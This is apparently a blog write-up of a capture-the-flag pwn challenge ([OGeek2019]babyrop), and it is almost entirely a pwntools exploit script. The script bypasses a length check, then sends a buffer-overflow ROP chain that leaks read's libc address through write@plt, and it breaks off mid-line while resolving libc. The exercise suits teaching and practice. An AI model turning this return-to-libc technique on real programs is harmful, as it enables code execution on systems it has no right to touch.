buupwn wp

April 7, 2021, 2:02 a.m.
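There are 8 more challenges before these. I wrote them up before I had set up the blog, and the first few are fairly simple, so I am not including them here.

1.[OGeek2019]babyrop

exp

```python
from pwn import *
from LibcSearcher import *

p=remote('node3.buuoj.cn',28810)
elf=ELF('./pwn')
# Resolve write@plt and read@got from the local copy of the binary
write_plt=elf.plt['write']
read_got=elf.got['read']
main_addr=0x8048825

# First input, sent before the "Correct" prompt
payload1=b'\x00'+b'a'*6+b'\xff'
p.sendline(payload1)
p.recvuntil(b"Correct\n")

# Second input: 0xe7 bytes of padding plus 4 more, then write(1, read_got, 4) returning to main
payload2=b'a'*0xe7+b'aaaa'
payload2+=p32(write_plt)+p32(main_addr)+p32(1)+p32(read_got)+p32(4)
p.sendline(payload2)

# Unpack the 4 bytes written back as the runtime address of read
read_addr=u32(p.recv(4))
libc=LibcSearcher(...
```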